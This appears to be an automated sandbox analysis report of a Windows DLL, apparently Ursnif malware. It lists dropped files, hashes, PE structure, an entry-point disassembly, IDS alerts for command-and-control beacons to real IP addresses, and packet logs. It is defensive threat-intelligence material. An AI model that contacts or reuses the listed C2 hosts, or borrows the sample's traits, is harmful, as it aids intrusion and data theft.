Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.1007656956481933 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq5ak7YnqqHOPN5Dlq5J:+RI+ycuZhNmakSuPNnqX |
MD5: | FF3BFB8D3A0A9EA79E282805E8CE2A46 |
SHA1: | A44C9C73E8FED7E57DF7D1A86D2D73FF710DC719 |
SHA-256: | 985C9235CD600547CD3336BB98F34F1B06DC62F755586E25329661B988A3BBF8 |
SHA-512: | E4AAE728A3F27722D4D153F0567F3E4DD412847B8D44DB0294198907439ED3E17F67AC5996890ED5579B21615E11F5F0FCE38A5169B3FDE1BAC7169D79087009 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.269530833890747 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fA2FT10zxs7+AEszIwkn23fA2FTdx:p37Lvkmb6KRfDFTqWZEifDFTP |
MD5: | 9D07155D75E02CC9B3D9B4BCA2605724 |
SHA1: | F26FBE154EC5A82B3EACBDC85DBA95D2D24258C7 |
SHA-256: | 7AFEA3ADB85E27E452FC85ABFE5C5DA6615BA9140937642383ECD4477E9B02B0 |
SHA-512: | 9307FDD16B84411C020C204B393C34CCC81ABE46C6575BB4892D32349ECAF9D321CCB2EA0F5C026B1EAAE0B134799B63547B7601F999EF7E3667DEAC71ED1AB6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.615083133545037 |
Encrypted: | false |
SSDEEP: | 24:etGSy8OmU0t3lm85xWAseO4zxQ64pfUPtkZfaFVUWI+ycuZhNmakSuPNnq:6MXQ3r5xNOKQfUuJaD31ulma3yq |
MD5: | 8443C1932024BF12E88200AEEA3979A9 |
SHA1: | 4B27B0D2CF3FAF614B4620719CDB2B65354EA9D0 |
SHA-256: | 60C95F0C07FCFECF930E9A6CF6B0035506F542EF69ED81C18AABB2F8BC90CC1C |
SHA-512: | E4AF72D9E12D8620EE6A910DD0E24D3CABE7F85C6673B71150E1FB2F716E1DE0FAA45A61BEE9A4B993A00ACD27A908D00FDE959A9DCBB9648389D3C2DD18BB2D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.336764594163779 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfpEifwKaM5DqBVKVrdFAMBJTH:Akka6CpEuwKxDcVKdBJj |
MD5: | 18E084FB1E0641B906E1057F169FD512 |
SHA1: | 34E718C95372728B9E6725DA855013D621C09E1F |
SHA-256: | 80B51B15FB9DEE28E44B9EC5D4FA97C740635F4C986AFBE3F462569F25ED035E |
SHA-512: | 6C5C704F14497B4292EE0FBC851A34305F2600FCBEDE5BA746F764F4926518B47AEAC1EE3100A8954EBA1F5241FADDA18B4EFF8E4620135C7BEF41D7D8D29B68 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220525\PowerShell_transcript.468325.mIKzyOcS.20220525112740.txt
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1367 |
Entropy (8bit): | 5.377240760406581 |
Encrypted: | false |
SSDEEP: | 24:BxSA/l7vBZ0x2DOXUWc15RfLCH94qWMHjeTKKjX4CIym1ZJXHHk15RfLCH94DGnx:BZ5vj0oO815R894tMqDYB1ZBk15R894a |
MD5: | 7ACB5D1BD81125AB675652E41023E0F0 |
SHA1: | 9FC97485AC5DAAACC281A2B8EFB5EF12596C3F64 |
SHA-256: | 30FE99D16BFDC9CEFF28EF81808969276F3F8651FE14126D5486D7C2B0C4B335 |
SHA-512: | ACF043703C782764BB648C1985A7A6704F95C8E8A2C8082B71CB04166DC3E62F178FA4B96EF2F73AC30980D406A207E3C27CB42BE96AC69EC0A4BDAFF70072F3 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.281202320961198 |
TrID: |
|
File name: | zs5n5sI6N2.dll |
File size: | 438272 |
MD5: | 9ce6868cb546819a7ba2fc27f91a3777 |
SHA1: | 6052120b0375f44ede4985ad98f7bd89beb70c2b |
SHA256: | fc4bee1a68545b7067fad93ba74478641acd683117f9fe478a4941d7146db959 |
SHA512: | ac6ae26a27242161fe48431916c8c7bfe2dea1b8f0b8ec1e07c30e4990d6cdb0c383ee846ba319eef082a50a90a858d5cb10f7fa4b00acbf0717b866105c51f6 |
SSDEEP: | 6144:SpmLsr+3OV4DS3D7qBWLARf3RBsFuIiUkok9dHGYgkKeOSnKM66C+m6iMabuFGGK:FsBUSzjLIRBMkf9dHLpKepKr6CvXG |
TLSH: | 9894F14897685D66D84647370CE1971EFCE7FE2EE63B7ABE20642C8FF95B0104512B0A |
File Content Preview: | MZ......................@...........................................................(.......0...w+!.W....]v...............4.....Y^........7.......x.........<.............A.............., ......,%.......{.......7.o.......O.....4.......5.......@.....Rich... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401520 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3EC34607 [Thu May 15 07:47:19 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 8000dfa78ad003480e4532227762516a |
Instruction |
---|
push ebp |
mov ebp, esp |
inc edx |
add ecx, FFFFFFFFh |
call 00007FD190FDD4AAh |
pop eax |
pop eax |
mov dword ptr [004136F4h], eax |
mov edx, dword ptr [00413810h] |
sub edx, 00005289h |
call edx |
mov eax, ebx |
mov dword ptr [004136F0h], eax |
mov eax, esi |
mov dword ptr [004136E8h], eax |
mov dword ptr [004136F8h], ebp |
mov dword ptr [004136ECh], edi |
add dword ptr [004136F8h], 00000004h |
loop 00007FD190FDD457h |
mov dword ptr [ebp+00h], eax |
nop |
nop |
or ebx, dword ptr [ebp+449BB717h] |
fsub st(0), st(5) |
push edx |
pop edx |
jnp 00007FD190FDD4F3h |
out dx, eax |
push ebp |
push ebx |
test byte ptr [ecx+7B670685h], cl |
inc esp |
cmp al, BBh |
push ebx |
mov cl, C6h |
das |
mov ah, 17h |
wait |
cmpsb |
jnbe 00007FD190FDD4CCh |
cmpsb |
fst qword ptr [edi-25h] |
out 23h, al |
jnbe 00007FD190FDD4B2h |
jno 00007FD190FDD503h |
salc |
dec byte ptr [edx+67779444h] |
pop eax |
cmp al, 97h |
outsd |
ror byte ptr [ecx+ecx*2], FFFFFFD3h |
inc edx |
inc ebx |
mov edx, 8F4D5DB0h |
add bl, ch |
mov ebp, 10EBFDC4h |
jmp far fword ptr [esi] |
push ecx |
mov ch, ah |
push ebx |
inc esi |
xchg eax, ebp |
mov esp, 2E29FAE8h |
cmc |
test al, BFh |
scasd |
fucom st(2), st(0) |
movsd |
mov ebp, 3238AE00h |
retf D184h |
mov ebx, 568788E4h |
insd |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd8a0 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6b000 | 0xf3c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x7c | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb8c0 | 0xc000 | False | 0.0830688476562 | data | 1.12975257539 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0xbea | 0x1000 | False | 0.2861328125 | data | 4.80028446978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xe000 | 0x7b80 | 0x6000 | False | 0.380167643229 | data | 5.99739209586 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x16000 | 0x1dc01 | 0x1e000 | False | 0.988452148437 | data | 7.98104004555 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x34000 | 0x2c91e | 0x2d000 | False | 0.988232421875 | data | 7.98142116636 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x61000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51666400073 | IMAGE_SCN_LNK_REMOVE, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_TYPE_GROUP, IMAGE_SCN_LNK_INFO, IMAGE_SCN_MEM_PROTECTED, IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_NO_DEFER_SPEC_EXC, IMAGE_SCN_MEM_READ |
.reloc | 0x6b000 | 0x133a | 0x2000 | False | 0.218994140625 | data | 3.75989927364 | IMAGE_SCN_TYPE_NOLOAD, IMAGE_SCN_TYPE_NO_PAD, IMAGE_SCN_MEM_FARDATA, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_LNK_OTHER, IMAGE_SCN_LNK_INFO, IMAGE_SCN_LNK_OVER, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_LNK_COMDAT, IMAGE_SCN_GPREL, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x61360 | 0x666 | data | English | United States |
RT_ICON | 0x619c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x66228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x687d0 | 0xea8 | data | English | United States |
RT_ICON | 0x69678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x69f20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6a488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6a540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6a660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6a7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6a9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6aab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6ab58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6ac48 | 0x4c | data | English | United States |
RT_VERSION | 0x6ac98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
ADVAPI32.dll | EnumServicesStatusExW, RegGetValueA, GetSidSubAuthorityCount |
msvcrt.dll | fgetwc, strcoll |
USER32.dll | GetClassNameA, LockWorkStation, GetMessagePos, GetWindowWord, IsWindow, GetClientRect, GetUpdateRgn |
GDI32.dll | GetCharWidthFloatA, GetTextMetricsW, ExtEscape |
OLEAUT32.dll | LoadTypeLibEx |
KERNEL32.dll | GetBinaryTypeA, GetModuleFileNameA, LocalHandle, GetThreadLocale, GetFileTime, GlobalFlags, EnumResourceTypesA, GetCommState, GlobalFree |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
192.168.2.413.107.42.1649765802033203 05/25/22-11:27:05.996967 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49765 | 80 | 192.168.2.4 | 13.107.42.16 |
192.168.2.413.107.42.1649765802033204 05/25/22-11:27:05.996967 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49765 | 80 | 192.168.2.4 | 13.107.42.16 |
192.168.2.4176.10.119.6849771802033203 05/25/22-11:27:28.182548 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
192.168.2.4176.10.119.6849771802033204 05/25/22-11:27:27.011665 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 25, 2022 11:27:26.101047993 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.119206905 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.119359970 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.119944096 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.137732029 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.411830902 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.411885023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.411897898 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.411990881 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412034035 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412241936 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412262917 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412298918 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412312031 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412319899 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412427902 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412446022 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412457943 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412484884 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412497044 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412524939 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412575006 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412811995 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412832022 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412842989 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412864923 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412899971 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.412903070 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.412951946 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431308031 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431339025 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431351900 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431366920 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431384087 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431395054 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431467056 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431495905 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431587934 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431607008 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431618929 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431644917 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431674957 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431727886 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431746960 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431760073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.431782961 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431796074 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.431967974 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432013988 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432110071 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432123899 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432157993 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432246923 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432266951 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432277918 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432302952 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432323933 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432363033 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432382107 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432393074 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432410002 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432418108 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432429075 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432432890 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432440996 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432461023 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432497978 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432504892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432523966 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432535887 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432549000 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432562113 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432570934 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.432595015 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432616949 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.432650089 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449609995 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449646950 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449666023 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449687958 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449695110 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449709892 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449722052 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449727058 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449742079 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449748993 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449759960 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449773073 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449788094 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449805975 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449810028 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449819088 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449827909 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449845076 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449865103 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449872017 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449888945 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449891090 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449908972 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.449915886 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449963093 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.449978113 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450001001 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450016975 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450038910 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450062990 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450122118 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450145960 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450160027 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450180054 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450189114 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450268030 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450289965 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450311899 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450323105 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450335026 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450444937 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450469971 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450489998 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450505018 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450514078 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450524092 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450541973 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450548887 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
May 25, 2022 11:27:26.450597048 CEST | 80 | 49771 | 176.10.119.68 | 192.168.2.4 |
May 25, 2022 11:27:26.450599909 CEST | 49771 | 80 | 192.168.2.4 | 176.10.119.68 |
